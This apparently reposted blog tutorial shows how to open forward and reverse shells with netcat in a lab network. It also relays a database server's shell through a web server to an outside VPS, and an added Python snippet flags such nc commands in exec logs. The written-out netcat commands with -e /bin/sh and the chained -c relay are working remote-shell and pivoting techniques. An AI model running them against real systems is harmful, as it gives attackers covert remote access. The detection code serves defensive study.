Using netcat on an intranet to get forward and reverse shells

This demonstration uses a Linux environment.
A reverse shell is usually used when an external network machine accesses an internal network machine. A forward shell is usually used between one internal network machine and another.

Forward shell
Since this setup involves the internal network and the border server, we demonstrate the forward shell first (in a forward shell, the listener runs on the target machine):
Command on the intranet machine: nc -lvp 4444 -e /bin/sh
Command on the local machine: nc 10.0.78.41 4444
The output shows that the connection is established, and verification confirms that the forward connection succeeded.

Reverse shell
In a reverse shell, the listener runs on the local VPS and the target machine connects to it.
Command on the local machine: nc -lvp 9999
Command on the internal network machine: nc 10.0.78.29 9999 -e /bin/sh
The output shows that the connection is established, and verification confirms that the reverse connection succeeded.

Next, practice getting a remote reverse shell from an internal network machine to an external network machine, using the border server as a springboard.
Prerequisites:
1. External network machine (VPS)
2. Border server (web server)
3. Intranet server (database server)
The VPS, the web server and the database server are separated by a firewall (LAN IP: 192.168.101.1).
The IP of each machine is as follows:
1. External network machine (VPS): [screenshot]
2. Border server (web server): [screenshot]
3. Intranet server (database server): [screenshot]

Then enter the following commands.
Enter the command in the VPS: nc -lvp 1234
Enter the command in the database server: nc -lvp 1234 -e /bin/sh
Enter the command in the web server: nc -v 10.0.78.29 1234 -c "nc -v 192.168.101.103 1234"
The output shows that the connection is established. On verification, the IP address reported is now that of the database server, so the relay succeeded.
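
For defenders, the three patterns on this page (forward shell, reverse shell, and the relay through the web server) all appear in process-execution logs as an nc command carrying -e or -c. The following Python is an added example, not part of the original post; the names classify_nc and scan and the finding labels are assumptions made for illustration, and the sample lines are the page's own commands used as constructed log input.

```python
import shlex

NC_NAMES = {"nc", "ncat", "netcat", "nc.traditional"}
SAMPLES = [  # constructed input: this page's commands as seen in exec logs
    "nc -lvp 4444 -e /bin/sh",
    "nc 10.0.78.41 4444",
    "nc 10.0.78.29 9999 -e /bin/sh",
    'nc -v 10.0.78.29 1234 -c "nc -v 192.168.101.103 1234 "',
]

def is_nc(token):
    return token.rsplit("/", 1)[-1] in NC_NAMES

def classify_nc(cmdline):
    """Return a finding for an nc command with -e/-c, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                      # unbalanced quotes
        return None
    if not argv or not is_nc(argv[0]):
        return None
    listen, program, rest, i = False, None, [], 1
    while i < len(argv):
        arg = argv[i]
        if len(arg) > 1 and arg[0] == "-" and arg[1] != "-":
            for pos, flag in enumerate(arg[1:], start=2):
                if flag == "l":
                    listen = True
                elif flag in "ecp":         # options that take a value
                    value = arg[pos:]       # value glued to the flag, if any
                    if not value and i + 1 < len(argv):
                        i += 1
                        value = argv[i]
                    if flag == "p":
                        rest.append(value)  # -p PORT
                    else:
                        program = value     # program attached to the socket
                    break
        else:
            rest.append(arg)
        i += 1
    if program is None:
        return None
    nested = program.split()[:1]            # -c "nc ..." chains a second nc
    kind = ("relay" if nested and is_nc(nested[0])
            else "forward-shell listener" if listen else "reverse-shell client")
    return {"kind": kind, "program": program.strip(), "endpoint": rest}

def scan(lines):
    return [(line, hit) for line in lines if (hit := classify_nc(line))]
```

Plain client and listener commands without -e or -c return None, so only the three shell-bearing commands from the page are reported by scan(SAMPLES).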

Origin blog.csdn.net/bring_coco/article/details/110822147